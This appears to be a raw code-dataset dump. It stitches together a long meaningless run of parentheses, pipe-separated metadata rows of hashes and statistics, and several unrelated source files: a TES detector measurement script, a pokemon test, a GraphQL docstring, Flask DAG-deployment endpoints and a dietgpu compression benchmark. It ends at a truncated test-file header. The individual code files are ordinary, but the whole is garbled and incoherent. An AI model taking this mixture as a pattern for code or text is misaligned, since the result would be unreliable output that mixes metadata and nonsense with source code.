()(())))()))))(()(()()(()(()()(((()))()))((()())))()(()(())))))))())((((()()))(()))))()((()))(()))())()))()))))(()(())()()()))(((((()))()())())(()())())))()())))))()()()())))))(())(((()))((())((()()))))()((((()(()(()))))(()(())(((())(()()(((()(())()())(()()(()(()())))()())))(((()()((()())()()((()))()))(((()((((()(((()(((()(()())((()))))()(()())(())()(()(((())((()))(())()(())()(()(())()))())()))()())(()))))()))))((()()()((()(()()(())))())(())()(()()))))))))()((()))((((())))())))((()()()(()(()((((()((()))()()((())((())(()))))(())())(((()()(()))))))(()()))()))((()(()(())()))(((())()))(())(()((((()((()()()))()()))(()()(())())((((((())(())((()())()(()())))()))())(()()(()(()()()(()()()()))(()(()()())())((()()()(((()((()())()()((()()(()((()())()())()((()))(()((()())))))))(())((((())(((((())(((())(()))(((()((()()())()((()(()))()()()(()((((())))(())())))((())))(()(((((()()()((())((((((((()()((((())))())())())))))))(((()())(((()))())))()))((())())())))))))))(()()(((())))))(())()()))((())()))(()(()))((()(()((((()(()(((()))))()))(()(()))())())()()(((())())(((()))))(((()())))()(()())()())()))())())(()()(((()()))(())(((()((())((((())))))((()))))(()((()(())))()(())((()(())((()(()())())))()))))(())())(()())()()()((())))((()()))()()()((((()())))))()))))()))())()((()(())()()(())(((()((()))(()(()()))(()))()))))))))))))(()()))(((())((()(((()()()(()())((((()(()()()))())))())(()())))(()((((()))((()()())(((()))()())(()(()((()(()))))(())()()((()())((()(()(()))((()((()())(((()(((((()()()))(()()(()(((()(()())()()()))((()(()())))())(()(()))(())()())))()()()))()())(()(((((()))()()((((()()()()))()()(()((()))(()))))))))))()))()(()((((((())(()))()((())))(((((())))))(()))))()()(()()()(((((()))()())()((((()()))()(())())))(((()((())))))))))(()()()((()))(()())((())))()()((()())))()()(()))))))))()(((()(()))()())((((((())))(((()(()())())))(())())())()()((((()(()(((())(()()(((((()))(()(())()))))))()))()())))()()(()))(((()))()())))((())(((()()))((((((())))(((())()()(()((()))())(()((()()(((())())()))()()())())(()()((((((((())))()(((())(()))))()()())()(())))(((((()())(((())()()))))()((())())(())()(()(()()((()))()(()(((()))))()()())(())()()()(((()((()()()(()())())(())()(((((()())(())()((((()()()))()((())()((()(()(((()(()))()())())()())()(()()(()(((()))()(())(()())(())((())()((()()())(()))))()(()()))))((())()()((()((()()(()((()()())(())))))())))()))))(((((()(()())(()))((()))()(()())())())))()(()()(()((())))))()()))((())((((()))))())((()))())((())((()(()((()))()()()))()((((((())((((((()((((((((()))(()(((()(((((((((())(())())()())))))))())())))()))(()))))()(()))(())))()()()((()()))(())(()))(()()(()())))()(()()()()())))(())((((()))(((((())(()(((((())((()((((()))(((((()))(()())()))))())()))()(()()))((((()))()())(())))()((())))(((((()()((()()((()))))()((())())()))(((((((((()((())((((())()())))(())())()))())))())()))()(()()(()))(()()()((())((()))())))()(()())()(((((((()))))(()()()((()(())))())()))((())())(()(()(())()()())))))(()()()))())()))()())(((())(())))()(())())))()((()(()(())()()()((()))()))((())((((()((((((()()()))()))())())))))()(())(()())))()(((()())(((())))((())()()))((())())()()(()()())()))())(((()((()(((()())(()(())(((())))()))))))())()((((((()))))))()(()))()))())))())((((())(())()(())()))()))((((((((()()(())())((((())))((((()(())()()(())()))())()))(((()((()))()(((((()()()))))(()(()())))(((()(((()(())())((((())(()((()((()(()()(()()))()))()()))()))))))())()(())())))(((())))((()))((()(())())((())))((()))()))(((()))))(()())()())())()())))())))(())))(())())()((()())()()))((()()())(((((()())))())))()()()((((((())())()((())()))(()))()(()())()())(())()())((()((())(())()()()()((())(()())()()((())))()(((()(()(((((()(())))()(()))()(()))()))())()))()())()(()))))()()())(((())((()((())(()(()))()((()))))))(())(()(())())()()((())((())((((())))))(()()())(()()())(())())(((()()(())(())))()()))(())))))())(())()(((())())))((()(((())))(()((())()))()))((()()())()(((((())((((())))(())()()((()()(()()))(()((()))((())())))))))()())))())())((()(()()()()()))))()))((())(((((()())(()))((())))((()(())))))))))(((())(()(())(()(())((()((()))()((())())()())()((()(())())()(((()()((()(()())))))())((())(((()())(((()(()((())((()(((())(()()((((((()))())))())(()(()(()()())())((()))((())(())(())())))()(()())()))())(())((((())()((())))))(()()((())(((((()))()()))()()())(()(((()))())()()()))(((()()))(()(()((())(())))()()((((()()))()(())()())()()()()()(()()))(((())(((()()()((((((((((()()()(((()))))))())))()(((((((()((((((((()))()(((())())())())((((((()()))(()))()))))(())()())))())(()))(((())()()()((()()((())(()))((()(()())))()(()((()((())()()()()(())()()((())())())()()))()()))))((()()((())(((())(())())))((())())())(()))))())))))()((()(()(()))))()))((((())((())())(()))))()((()))(())((()()))()()((())(())())))(())))))()()(()())((()(())(((()((())))()())))()))()))))(())()(()))((()()()()))(())))(()()(())(((()(((()()))()((()))())()))(()(()))())))))))()((()(()))(((())())(())(()))(())(()((()))))))(()())(()()()(((()(((((()))((()))))(()))(())())(((()(()())(()()()()))())(()((()(()))()))())))(((()(()))))()))(()()((())())(()()())((()))(())))()()))(())))())))(()((())((()))((()))))())()()()((((((())((())()))(()))(())(())())))()())()((())))((()()())(()))(((()))())())))(())(())())()())()))((((()()()()))(())))((((())))(())(()((((()))())()))))))()()()))())))()((())))))((())())))()()(()()(()(()()()())((((())))(())(((())(()(()((((())(()()()(()(()((())(())(()())((((()((()((((((()((((())(((()())()((((()((())()(()(()(()((()()()(()(()())(((()(())(()(())(())(()))()((((((((()()(())))(()()(((())()(()(((((()())((()(())()())(((()(()(())()((((((((())()((()()((((())(((()(()((()((((()((((()(()(())())()(((()()))))))(()(((())()(((()())))((()))))(()()))))(()))))))((())())((())))()()()(()((()))()))()))()()()()()))(((((((()((()))((())()(()(()))()((((((((((((()(())))))(()())))()(()()(()(()()))))(((((()()((())()))())()()()))(())())()())()()((()()(()(()()(()))))))()()))(()()((()))))()((()()()())))(((()(((()()(())(())(()(((())(()((()(()))(()()((())()(()()())()))))))(()()((())((()())))(())(()))()(()))(()))()))()(())()(()())))(()))(()()(((()))))())))))((())())))))()()()))(()))((()())())()()))(((())((()((())()(()))()((()))()(())))))))()()())())))(()()(())(()))(())))))()(()))(()()))))))))((((()()()()()))(()))((()((())))(()())(((()()()(())))))()))()())())(()()()))))))((()())))((())))(())()((()))()(()())())))))(((()()(()(())()())(((((()))((()(())(())))))))()()))))))((()((((()()))()))(()()))(()()(())))))(((()()))(()())))(())()((()((()(((()()()()((()())())(()(((((((()((((())(()((((()()(())))))(()())))))(()())))())(())))((()(()))(()())(((())))((((())))))((()))()(((((((())())())((())))))))(()))))))))()((()()())((())))(())))((()(((()(())(())))()()()()))(())(()(())()())(())))()())((()((()((()()((())())))(()((())()()))()))((()()(()))(((((((()))((())((())((())()()((((((((()())()()()))(()()(((()(())()))()))()))()()(()(((((()))))((())(((()))()((((((((()()()()(()))()(()))()(())))))))()((((()()((()(())()((()))((()()(()()))))))))))(())(()))()()((((())))()((())(()((()((()(())()))()()((((()))))()))())))))())(((()()))()))()(()))(()))()((()((((((())())))()))()((())(()(())))))))()))(()()()())())()))((()))(()((()((()())))))((((())()()())(())())()((()((()())()())()(()))))((()())))()))()()))))()((())))())(()))()))(()((())(()))))()()))(()()((((()()))(((()()())(()(()(((()))())))((((()())()()()(())()()()((()))))((()()(()()))()())))(((((()(())())))))(()))))())))(())())()))))((()))))))(((())(((())()(((())))(()))()())(((()(()(((()))))()(()()(())())))))())())()()((())))()(())((()))((())(()())(()()()(()()())((())())))))((()(()())()()))))(()()(()()()(()()))((((((()))(()())(())(())())((())(()(()))((()()(()))))()))()(())))())))())(()((())))((())(()()()(()))((()((((((()())()()))))()))((()((())()))()((((()()()(((())())))()()()())())())(()())()))()(())(())()))())((()(((((()))(())(((((()))(()())(()(()(())()((()(()(()))()(()))))()(((())(()((((((()))(()(((()()())()())((()())))((()((()())()((((((())()))(()))))(()()()()))())())((((((((())((((()()()))(())()()))(()(()()(()(()))))(()))(()()()(())()()(())(()))())((()()((()(()))()))))())((()())())(((((()(()()))((()()()))()()(()(()(((()())(((((((((()))()())(()(()(())(((((()()))))(()())(()())())(())))))((()))())(((()((((()))()))(()(()(((()()(()(((()()))(())))((((()(()()))))((((()()())()))())()))))((())((((((())()()))()))()(((()((())(()((((()())())((((((((((()(((((()())()()(()))))))()((((())())(((()()((((()()())()(((((())))()))(())())(((()(((())()))()()()()(())))(()(((()(()))())))()(((()()()()()(()(((()(((()))()(())(())()()))()((()))))))()(((((()(()()((())(())((())))()(()())(())))())((())(()(()()(((())((()()(()()((()))))())))()(()))()))))))())())))((((((()())))(())(()))()()))()(())))))))((()))(()()()()))()())()()()()))()()())))))))((())(())))(()))(())((()())))(()(((()))((((())())))(())((())())))))(((()())(())()(())))((()()()((()(()))()))(())))((()(()()((()()()))((()))((()))()))(()())()()(((((((((()(()))()())()((())((((((((()(())()(((()((())()((((((((()))())))(()((()((())())())((()()())))(()(()((((((()))))((((())))((()()(())()())()()())(())(((()(()()(())(((())((((())()()(()()(((())()(())((()(()(((()(()())))()))((()()())(())))))(()(()))()))()(()))))(()((()))()())(())(())(()))((()())()))())()())((((()))))())())(((()))(((()()((()((())(())()()))))(((()((((()(((((((((())()()()(())((()(()()(()()(()()(())()())(((((()))))()(())(((()((((()())(()(((()))))()))())((((()()((()(()))))((())(())(()(()))()()(((()))(((((((((()())))((())()(()(((((((()))))))()()(())(((()(()())()()))((()()))((((()(())())))((()())))))()))))))))()()(((())())((()))())((())((()()))())((((((((())((()((())())))))()()))))))()()(())))))()))()()(((()))))(())((((()()()()))((()((((()()(())(((((()())()))))))())())()((((((((((()))()))((()))(())())(()(()(())((()()(()((())(())((((())(()()(()((()((()(((((()(()()((((())(())())(()()())()())((()(())()(())()))))") | 872.733333 | 12,518 | 0.03025 | 42 | 13,091 | 9.238095 | 0.214286 | 0.226804 | 0.878866 | 0.927835 | 0.878866 | 0.878866 | 0.878866 | 0.878866 | 0.878866 | 0.878866 | 0 | 0 | 0.006187 | 13,091 | 15 | 12,518 | 872.733333 | 0.029823 | 0 | 0 | 0 | 0 | 0 | 0.959288 | 0.954934 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.071429 | null | null | 0.785714 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 16 |
b1e9ecb7077073da110feb44a637ac676ceb48b2 | 5,078 | py | Python | tes/data_acquisition.py | Leo-am/tespackage | 1e3447951532411eb3596c6dbeaf781c4b006676 | [
"MIT"
] | null | null | null | tes/data_acquisition.py | Leo-am/tespackage | 1e3447951532411eb3596c6dbeaf781c4b006676 | [
"MIT"
] | null | null | null | tes/data_acquisition.py | Leo-am/tespackage | 1e3447951532411eb3596c6dbeaf781c4b006676 | [
"MIT"
] | null | null | null | """
Module used to perform measurements with the TES.
Functions:
1) trace_drive
2) pulse_drive
"""
import yaml
from tes.registers import Registers
from tes.data import capture
def trace_drive(time, channel, p_thres, s_thres,
baseline_sub, datapath, filename):
"""
Record TES traces.
Parameters
----------
time : int
Time in seconds to take measurements.
channel : int
Processing channel chosen to take measurements.
p_thres : int
Pulse threshold chosen using the MCA.
s_thres : int
Slope threshold chosen using the MCA.
base_sub : bool
If True, the baseline correction will be activated.
It can automatically update the baseline level in
the case where it changes.
datapath : str
Folder where the registers will be saved.
filename : str
Name of the file where the registers will be saved.
Returns
-------
None
Notes
-----
Keep your trace measurements up to 1 minute.
"""
r = Registers('tcp://smp-loophole.instrument.net.uq.edu.au:10001')
time_measurement = time/(r.tick_period*4e-9)
print(time_measurement)
r.baseline[channel].subtraction = baseline_sub
# disabling all event registers
r.event.enable = False
# trace settings
r.event[channel].packet = 'trace'
r.event[channel].trace = 0
r.event[channel].trace_type = 'single'
r.event[channel].trace_sequence = 0
r.event[channel].trace_stride = 5
r.event[channel].trace_pre = 512
r.event[channel].trace_length = 2048
# event settings
r.event[channel].timing = 0
r.event[channel].max_rises = 1
r.event[channel].height = 'peak'
r.event[channel].pulse_threshold = p_thres
r.event[channel].slope_threshold = s_thres
r.event[channel].area_threshold = 0
# inform user about baseline subtraction
if r.baseline[channel].subtraction:
print('bl on')
measurement = (
'trace-pulse_BL-{!r}-{!r}-'
.format(r.event[channel].timing, r.event[channel].height)
)
else:
print('bl off')
measurement = (
'trace-pulse-{!r}-{!r}-'
.format(r.event[channel].timing, r.event[channel].height)
)
# Making measurements
r.event.enable = True
# limit to 1 min as no dropped frames
c = capture(filename, measurement, ticks=time_measurement)
r.event.enable = False
# saving registers
fname = '{}{}/{}_reg.yml'.format(datapath, filename, measurement)
f = open(fname, 'w+')
f.write(yaml.dump(dict(r.all)))
f.close()
# checking what has been done
print(measurement)
print(c)
def pulse_drive(time, channel, p_thres, s_thres,
baseline_sub, datapath, filename):
"""
Perform measurements over TES traces.
Measure the following characteristics of TES traces:
1) Length
2) Area
3) Maximum slope or height
4) Rise Time
Parameters
----------
time : int
Time in seconds to take measurements.
channel : int
Processing channel chosen to take measurements.
p_thres : int
Pulse threshold chosen using the MCA.
s_thres : int
Slope threshold chosen using the MCA.
base_sub : bool
If True, the baseline correction will be activated.
It can automatically update the baseline level in
the case where it changes.
datapath : str
Folder where the registers will be saved.
filename : str
Name of the file where the registers will be saved.
Returns
-------
None
"""
r = Registers('tcp://smp-loophole.instrument.net.uq.edu.au:10001')
time_measurement = time/(r.tick_period*4e-9)
print(time_measurement)
r.baseline[channel].subtraction = baseline_sub
# disabling all event registers
r.event.enable = False
# trace settings
r.event[channel].packet = 'pulse'
# event settings
r.event[channel].timing = 0
r.event[channel].max_rises = 1
r.event[channel].height = 'peak'
r.event[channel].pulse_threshold = p_thres
r.event[channel].slope_threshold = s_thres
r.event[channel].area_threshold = 0
# inform user about baseline subtraction
if r.baseline[channel].subtraction:
print('bl on')
measurement = (
'-pulse_BL-{!r}-{!r}-test3'
.format(r.event[channel].timing, r.event[channel].height)
)
else:
print('bl off')
measurement = (
'-pulse-{!r}-{!r}-test3'
.format(r.event[channel].timing, r.event[channel].height)
)
# Making measurements
r.event.enable = True
c = capture(filename, measurement, ticks=time_measurement)
r.event.enable = False
# saving registers
fname = '{}{}/{}_reg.yml'.format(datapath, filename, measurement)
f = open(fname, 'w+')
f.write(yaml.dump(dict(r.all)))
f.close()
# checking what has been done
print(measurement)
print(c)
| 25.39 | 70 | 0.625837 | 646 | 5,078 | 4.846749 | 0.239938 | 0.065155 | 0.116257 | 0.034494 | 0.836155 | 0.824018 | 0.824018 | 0.824018 | 0.824018 | 0.824018 | 0 | 0.010735 | 0.266247 | 5,078 | 199 | 71 | 25.517588 | 0.829576 | 0.363529 | 0 | 0.734177 | 0 | 0 | 0.091275 | 0.06443 | 0 | 0 | 0 | 0 | 0 | 1 | 0.025316 | false | 0 | 0.037975 | 0 | 0.063291 | 0.126582 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
3cf2b6d19af7c929fbc9aaa1e0a2a8e7766f9a60 | 164 | py | Python | modules/tests/test_pokemon.py | superbahbi/JARVIS-on-Messenger | a9ceffff7fd90e7149d51211b43d2b6e1003f63f | [
"MIT"
] | null | null | null | modules/tests/test_pokemon.py | superbahbi/JARVIS-on-Messenger | a9ceffff7fd90e7149d51211b43d2b6e1003f63f | [
"MIT"
] | null | null | null | modules/tests/test_pokemon.py | superbahbi/JARVIS-on-Messenger | a9ceffff7fd90e7149d51211b43d2b6e1003f63f | [
"MIT"
] | null | null | null | import modules
def test_hello():
assert('pokemon' == modules.process_query('notify')[0])
assert('pokemon' != modules.process_query('something random')[0])
| 27.333333 | 69 | 0.70122 | 20 | 164 | 5.6 | 0.65 | 0.232143 | 0.357143 | 0.482143 | 0.571429 | 0 | 0 | 0 | 0 | 0 | 0 | 0.013889 | 0.121951 | 164 | 5 | 70 | 32.8 | 0.763889 | 0 | 0 | 0 | 0 | 0 | 0.219512 | 0 | 0 | 0 | 0 | 0 | 0.5 | 1 | 0.25 | true | 0 | 0.25 | 0 | 0.5 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
a715457722503daa6e285efb408bff2985a3675d | 128 | py | Python | back/graphql/__init__.py | 8area8/plenkton-api | b4b7ed5f7ac3a2c87e8dacf1d6c43b9d3d53796e | [
"MIT"
] | null | null | null | back/graphql/__init__.py | 8area8/plenkton-api | b4b7ed5f7ac3a2c87e8dacf1d6c43b9d3d53796e | [
"MIT"
] | 32 | 2022-02-12T20:16:46.000Z | 2022-03-31T23:07:22.000Z | back/graphql/__init__.py | 8area8/plenkton-api | b4b7ed5f7ac3a2c87e8dacf1d6c43b9d3d53796e | [
"MIT"
] | null | null | null | """Graphql package.
https://strawberry.rocks/docs/integrations/fastapi
https://strawberry.rocks/docs/integrations/pydantic
"""
| 21.333333 | 51 | 0.789063 | 14 | 128 | 7.214286 | 0.642857 | 0.29703 | 0.39604 | 0.475248 | 0.712871 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.046875 | 128 | 5 | 52 | 25.6 | 0.827869 | 0.9375 | 0 | null | 0 | null | 0 | 0 | null | 0 | 0 | 0 | null | 1 | null | true | 0 | 0 | null | null | null | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
5957e966677af80b8e4a085286cd24e535e9fb68 | 2,808 | py | Python | src/integration-provider/qai_testbed_integration_provider/controllers/api/deploy_dag.py | ads-ad-itcenter/qunomon.forked | 48d532692d353fe2d3946f62b227f834f9349034 | [
"Apache-2.0"
] | 16 | 2020-11-18T05:43:55.000Z | 2021-11-27T14:43:26.000Z | src/integration-provider/qai_testbed_integration_provider/controllers/api/deploy_dag.py | aistairc/qunomon | d4e9c5cb569b16addfbe6c33c73812065065a1df | [
"Apache-2.0"
] | 1 | 2022-03-23T07:55:54.000Z | 2022-03-23T13:24:11.000Z | src/integration-provider/qai_testbed_integration_provider/controllers/api/deploy_dag.py | ads-ad-itcenter/qunomon.forked | 48d532692d353fe2d3946f62b227f834f9349034 | [
"Apache-2.0"
] | 3 | 2021-02-12T01:56:31.000Z | 2022-03-23T02:45:02.000Z | # Copyright © 2019 National Institute of Advanced Industrial Science and Technology (AIST). All rights reserved.
from flask import request
from flask_restful import Resource
from injector import inject
from qlib.utils.logging import get_logger, log
from ...usecases.deploy_dag import DeployDAGService
from ..dto import ResultSchema, Result
from ...across.exception import QAIException
logger = get_logger()
class DeployDAGAPI(Resource):
@inject
def __init__(self, service: DeployDAGService):
self.service = service
# @jwt_required()
# @helpers.standardize_api_response
# TODO 要変換アノテーション
@log(logger)
def post(self):
try:
res = self.service.post(request)
return ResultSchema().dump(res), 200
except QAIException as e:
logger.exception('Raise Exception: %s', e)
return ResultSchema().dump(e.to_result()), e.status_code
except Exception as e:
logger.exception('Raise Exception: %s', e)
return ResultSchema().dump(Result(code='D99999', message='internal server error: {}'.format(e))), 500
class DeployDAGAsyncAPI(Resource):
@inject
def __init__(self, service: DeployDAGService):
self.service = service
# @jwt_required()
# @helpers.standardize_api_response
# TODO 要変換アノテーション
@log(logger)
def post(self):
try:
res = self.service.post(request, is_async_build=True)
return ResultSchema().dump(res), 200
except QAIException as e:
logger.exception('Raise Exception: %s', e)
return ResultSchema().dump(e.to_result()), e.status_code
except Exception as e:
logger.exception('Raise Exception: %s', e)
return ResultSchema().dump(Result(code='D99999', message='internal server error: {}'.format(e))), 500
# @jwt_required()
# @helpers.standardize_api_response
# TODO 要変換アノテーション
@log(logger)
def get(self):
res = self.service.get_async()
return ResultSchema().dump(res), 200
class DeployDAGNonBuildAPI(Resource):
@inject
def __init__(self, service: DeployDAGService):
self.service = service
# @jwt_required()
# @helpers.standardize_api_response
# TODO 要変換アノテーション
@log(logger)
def post(self):
try:
res = self.service.post(request, is_build=False)
return ResultSchema().dump(res), 200
except QAIException as e:
logger.exception('Raise Exception: %s', e)
return ResultSchema().dump(e.to_result()), e.status_code
except Exception as e:
logger.exception('Raise Exception: %s', e)
return ResultSchema().dump(Result(code='D99999', message='internal server error: {}'.format(e))), 500
| 31.909091 | 113 | 0.649217 | 319 | 2,808 | 5.598746 | 0.253919 | 0.06159 | 0.12318 | 0.06047 | 0.7486 | 0.732923 | 0.732923 | 0.732923 | 0.732923 | 0.732923 | 0 | 0.018753 | 0.240385 | 2,808 | 87 | 114 | 32.275862 | 0.818097 | 0.133191 | 0 | 0.719298 | 0 | 0 | 0.085537 | 0 | 0 | 0 | 0 | 0.011494 | 0 | 1 | 0.122807 | false | 0 | 0.122807 | 0 | 0.473684 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
59a84dd3df1292b8e2f4fb5d65a05f6473bfd658 | 6,920 | py | Python | dietgpu/benchmark.py | facebookresearch/dietgpu | 182ba5aa39643fcf8325e5a3326c0f1c2ffa6ab9 | [
"MIT"
] | 190 | 2022-01-31T17:09:34.000Z | 2022-03-24T23:22:12.000Z | dietgpu/benchmark.py | facebookresearch/dietgpu | 182ba5aa39643fcf8325e5a3326c0f1c2ffa6ab9 | [
"MIT"
] | 1 | 2022-03-09T05:21:37.000Z | 2022-03-09T05:41:54.000Z | dietgpu/benchmark.py | facebookresearch/dietgpu | 182ba5aa39643fcf8325e5a3326c0f1c2ffa6ab9 | [
"MIT"
] | 10 | 2022-01-31T18:02:09.000Z | 2022-03-09T05:20:45.000Z | # Copyright (c) (c) Meta Platforms, Inc. and affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
# Simple benchmarking script for both float and raw byte-wise ANS codecs in
# PyTorch using the asynchronous API, as applied to floating point data
# ~ N(0, 1)
import torch
torch.ops.load_library("//dietgpu:dietgpu")
dev = torch.device("cuda:0")
def calc_comp_ratio(input_ts, out_sizes):
total_input_size = 0
total_comp_size = 0
for t, s in zip(input_ts, out_sizes):
total_input_size += t.numel() * t.element_size()
total_comp_size += s
return total_input_size, total_comp_size, total_comp_size / total_input_size
def get_float_comp_timings(ts, num_runs=3):
tempMem = torch.empty([384 * 1024 * 1024], dtype=torch.uint8, device=dev)
comp_time = 0
decomp_time = 0
total_size = 0
comp_size = 0
# ignore first run timings
for i in range(1 + num_runs):
start = torch.cuda.Event(enable_timing=True)
end = torch.cuda.Event(enable_timing=True)
rows, cols = torch.ops.dietgpu.max_float_compressed_output_size(ts)
comp = torch.empty([rows, cols], dtype=torch.uint8, device=dev)
sizes = torch.zeros([len(ts)], dtype=torch.int, device=dev)
start.record()
comp, sizes, memUsed = torch.ops.dietgpu.compress_data(
True, ts, tempMem, comp, sizes
)
end.record()
comp_size = 0
torch.cuda.synchronize()
if i > 0:
comp_time += start.elapsed_time(end)
total_size, comp_size, _ = calc_comp_ratio(ts, sizes)
out_ts = []
for t in ts:
out_ts.append(torch.empty(t.size(), dtype=t.dtype, device=t.device))
# this takes a while
comp_ts = [*comp]
out_status = torch.empty([len(ts)], dtype=torch.uint8, device=dev)
out_sizes = torch.empty([len(ts)], dtype=torch.int32, device=dev)
start = torch.cuda.Event(enable_timing=True)
end = torch.cuda.Event(enable_timing=True)
start.record()
torch.ops.dietgpu.decompress_data(
True, comp_ts, out_ts, tempMem, out_status, out_sizes
)
end.record()
torch.cuda.synchronize()
if i > 0:
decomp_time += start.elapsed_time(end)
# validate
for a, b in zip(ts, out_ts):
assert torch.equal(a, b)
comp_time /= num_runs
decomp_time /= num_runs
return comp_time, decomp_time, total_size, comp_size
def get_any_comp_timings(ts, num_runs=3):
tempMem = torch.empty([384 * 1024 * 1024], dtype=torch.uint8, device=dev)
comp_time = 0
decomp_time = 0
total_size = 0
comp_size = 0
# ignore first run timings
for i in range(1 + num_runs):
start = torch.cuda.Event(enable_timing=True)
end = torch.cuda.Event(enable_timing=True)
rows, cols = torch.ops.dietgpu.max_any_compressed_output_size(ts)
comp = torch.empty([rows, cols], dtype=torch.uint8, device=dev)
sizes = torch.zeros([len(ts)], dtype=torch.int, device=dev)
start.record()
comp, sizes, memUsed = torch.ops.dietgpu.compress_data(
False, ts, tempMem, comp, sizes
)
end.record()
comp_size = 0
torch.cuda.synchronize()
comp_time = start.elapsed_time(end)
total_size, comp_size, _ = calc_comp_ratio(ts, sizes)
out_ts = []
for t in ts:
out_ts.append(torch.empty(t.size(), dtype=t.dtype, device=t.device))
# this takes a while
comp_ts = [*comp]
out_status = torch.empty([len(ts)], dtype=torch.uint8, device=dev)
out_sizes = torch.empty([len(ts)], dtype=torch.int32, device=dev)
start = torch.cuda.Event(enable_timing=True)
end = torch.cuda.Event(enable_timing=True)
start.record()
torch.ops.dietgpu.decompress_data(
False, comp_ts, out_ts, tempMem, out_status, out_sizes
)
end.record()
torch.cuda.synchronize()
decomp_time = start.elapsed_time(end)
for a, b in zip(ts, out_ts):
assert torch.equal(a, b)
return comp_time, decomp_time, total_size, comp_size
for dt in [torch.bfloat16, torch.float16, torch.float32]:
# Non-batched
ts = []
ts.append(torch.normal(0, 1.0, [128 * 512 * 1024], dtype=dt, device=dev))
c, dc, total_size, comp_size = get_float_comp_timings(ts)
ratio = comp_size / total_size
c_bw = (total_size / 1e9) / (c * 1e-3)
dc_bw = (total_size / 1e9) / (dc * 1e-3)
print("Float codec non-batched perf [128 * 512 * 1024] {}".format(dt))
print(
"comp time {:.3f} ms B/W {:.1f} GB/s, compression {} -> {} bytes ({:.4f}x) ".format(
c, c_bw, total_size, comp_size, ratio
)
)
print("decomp time {:.3f} ms B/W {:.1f} GB/s".format(dc, dc_bw))
# Batched
ts = []
for i in range(128):
ts.append(torch.normal(0, 1.0, [512 * 1024], dtype=dt, device=dev))
c, dc, total_size, comp_size = get_float_comp_timings(ts)
ratio = comp_size / total_size
bw = (total_size / 1e9) / (c * 1e-3)
dc_bw = (total_size / 1e9) / (dc * 1e-3)
print("Float codec batched perf [128, [512 * 1024]] {}".format(dt))
print(
"comp time {:.3f} ms B/W {:.1f} GB/s, compression {} -> {} bytes ({:.4f}x) ".format(
c, c_bw, total_size, comp_size, ratio
)
)
print("decomp time {:.3f} ms B/W {:.1f} GB/s".format(dc, dc_bw))
print("\n")
for dt in [torch.bfloat16, torch.float16, torch.float32]:
# Non-batched
ts = []
ts.append(torch.normal(0, 1.0, [128 * 512 * 1024], dtype=dt, device=dev))
c, dc, total_size, comp_size = get_any_comp_timings(ts)
ratio = comp_size / total_size
c_bw = (total_size / 1e9) / (c * 1e-3)
dc_bw = (total_size / 1e9) / (dc * 1e-3)
print("Raw ANS byte-wise non-batched perf [128 * 512 * 1024] {}".format(dt))
print(
"comp time {:.3f} ms B/W {:.1f} GB/s, compression {} -> {} bytes ({:.4f}x) ".format(
c, c_bw, total_size, comp_size, ratio
)
)
print("decomp time {:.3f} ms B/W {:.1f} GB/s".format(dc, dc_bw))
# Batched
ts = []
for i in range(128):
ts.append(torch.normal(0, 1.0, [512 * 1024], dtype=dt, device=dev))
c, dc, total_size, comp_size = get_any_comp_timings(ts)
ratio = comp_size / total_size
c_bw = (total_size / 1e9) / (c * 1e-3)
dc_bw = (total_size / 1e9) / (dc * 1e-3)
print("Raw ANS byte-wise batched perf [128, [512 * 1024]] {}".format(dt))
print(
"comp time {:.3f} ms B/W {:.1f} GB/s, compression {} -> {} bytes ({:.4f}x) ".format(
c, c_bw, total_size, comp_size, ratio
)
)
print("decomp time {:.3f} ms B/W {:.1f} GB/s".format(dc, dc_bw))
| 30.892857 | 94 | 0.601012 | 1,026 | 6,920 | 3.88499 | 0.145224 | 0.058705 | 0.039137 | 0.051179 | 0.875063 | 0.86277 | 0.846212 | 0.831661 | 0.831661 | 0.811089 | 0 | 0.040828 | 0.26026 | 6,920 | 223 | 95 | 31.03139 | 0.737839 | 0.067197 | 0 | 0.718121 | 0 | 0.026846 | 0.106089 | 0 | 0 | 0 | 0 | 0 | 0.013423 | 1 | 0.020134 | false | 0 | 0.006711 | 0 | 0.04698 | 0.087248 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
59d192c8c0a594e128dd414ef275adac229f7f5e | 39,326 | py | Python | orquesta/tests/unit/conducting/test_workflow_conductor.py | batk0/orquesta | f03f3f2f3820bf111a9277f4f6c5d6c83a89d004 | [
"Apache-2.0"
] | null | null | null | orquesta/tests/unit/conducting/test_workflow_conductor.py | batk0/orquesta | f03f3f2f3820bf111a9277f4f6c5d6c83a89d004 | [
